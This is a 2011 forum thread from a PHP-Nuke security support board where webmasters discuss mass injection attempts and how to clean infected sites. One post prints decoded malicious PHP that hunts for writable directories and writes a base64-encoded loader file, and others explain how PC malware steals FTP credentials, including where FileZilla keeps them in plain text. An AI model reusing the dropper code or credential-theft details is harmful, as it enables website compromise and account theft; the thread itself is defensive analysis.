Joined: Dec 19, 2004 Posts: 3143 Location: Germany:Moderator German NukeSentinel Support
Posted:
Tue Sep 27, 2011 2:55 pm
Be happy NukeSentinel is working.
I have not seen such mass attacks at my sites.
Do you have Google Plus installed possible in your Forums ?
I not really believe this could be a reason but who knows.
They try to insert the loader in your writeable dirs and etc...
No Google Plus and I stopped counting at 400 attempts. I was more interested in that User Agent string more than anything, never seen one like that before. And YES, thank goodness for NS.
Joined: Oct 01, 2010 Posts: 415 Location: Houston, Tx
Posted:
Wed Sep 28, 2011 2:33 pm
That code and other code similar to that, allow hackers to remotely infect your website after you've changed FTP passwords.
Also look in your images folders to see if you have a file called gifimg.php. It's malicious as well.
From what we've seen, this type of infection is usually the result of a virus on a PC that has FTP access to the infected website. The virus steals the FTP login credentials, sends them to a server which then infects the website using valid FTP login and password.
The virus works in a variety of ways.
First, if you're using a program like FileZilla or CuteFTP or any of the other free programs, your login credentials are stored in a plain text file on your PC. For FileZilla, look in: C:\Documents and Settings\(user)\Application Data\FileZilla\sitemanager.xml
If you have multiple accounts setup in FileZilla, you'll see all of them listed in plain text in that file. That makes it extremely easy for a virus to find and steal.
Second, the virus works by "sniffing" the FTP traffic leaving your PC. Since FTP transmits all data, including username and password, in plain text, it's easy for the virus to see and steal that information.
Third, the virus also acts as a keylogger. So for those who don't save their credentials but type it in each time, the virus can still get it.
I use WS_FTP by IpSwitch because they encrypt their saved credentials. You can also switch to SFTP if your hosting provider supports it. SFTP encrypts the traffic between your PC and the destination.
Quite often it requires a different anti-virus program to find and remove the virus on the infected PC. The virus learns how to evade detection from the currently installed anti-virus.
I usually recommend either Kaspersky or Vipre (Sunbelt Software).
Remove all of those eval(base64_decode strings, then scan all PCs with a different anti-virus program, after changing all FTP passwords.
Only registered users can see links on this board! Get registered or login to the forums!
Your code decoded:
Code:
@ini_set('allow_url_fopen', 1); $current_dir = preg_replace('@/$@', '', $_SERVER['DOCUMENT_ROOT'] . '/' . dirname($_SERVER['PHP_SELF'])); if (@is_writable($current_dir)) {
createLoader($current_dir, ''); } else { $dirs = @opendir($current_dir); while ($dir = @readdir($dirs)) { $dir = trim($dir); if (!$dir ||
preg_match('/^\.+$/', $dir) || !@is_dir("$current_dir/$dir") || !@is_writable("$current_dir/$dir")) continue; createLoader("$current_dir/$dir", $dir); break; } @closedir($dirs); }
function createLoader($path, $dir = '') { $loaderName = 'loaderz.9aa1d17ea47adbec6a1758849b8ff314.php'; $fp =
fopen("$path/$loaderName", 'w'); fwrite($fp, base64_decode(DECODED AND PUT IN NEXT CODE BLOCK)); fclose($fp); if
(file_exists("$path/$loaderName")) print "91746876256484****{$dir}****"; }
Joined: Aug 28, 2003 Posts: 6373 Location: Vsetin, Czech Republic
Posted:
Wed Sep 28, 2011 3:07 pm
So one way to stop this on a temporary basis would also be to block the script from writing to it's database at the IP 109.230.246.115
Their range is 109.230.246.0 - 109.230.246.255
CIDR 109.230.240.0/20
Joined: Oct 01, 2010 Posts: 415 Location: Houston, Tx
Posted:
Wed Sep 28, 2011 3:10 pm
Seems to me that it's actually originating from an infected pc. I'd start by cleaning w/e pc's I FTP "FROM" (I.e. your own pc)... then make sure the site is clean as well. (I.e. check the directories etc)
It appears that NS has stopped it...but that doesn't mean someone hasn't already gotten your FTP credentials.
***Edit
Here is the dnsstuff on it:
Quote:
inetnum: 109.230.246.0 - 109.230.246.255
netname: XSSERVER-EU
descr: xsserver.eu Dedicated Servers
remarks: +---------------------------------------------------
remarks: | We are Server Provider |
remarks: +---------------------------------------------------
remarks: | |
remarks: | These IP-Numbers are in use by our customers. |
remarks: | In case of Spam/Virus/Portscan/Attack etc |
remarks: | please send an email to *****@xsserver.eu |
remarks: | containing the IP-Number involved and timestamps. |
remarks: | |
remarks: +---------------------------------------------------
remarks: INFRA-AW
country: DE
admin-c: GB11245-RIPE
tech-c: GB11245-RIPE
status: ASSIGNED PA
mnt-by: MNT-XSSERVER
mnt-lower: MNT-XSSERVER
mnt-routes: MNT-XSSERVER
changed: ******@optimate-server.de 20110203
source: RIPE
View next topic View previous topic
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
![[Valid RSS]](http://www.ravenphpscripts.com/images/valid-rss.png "Validate my RSS feed"){kind=small}
:: 
::
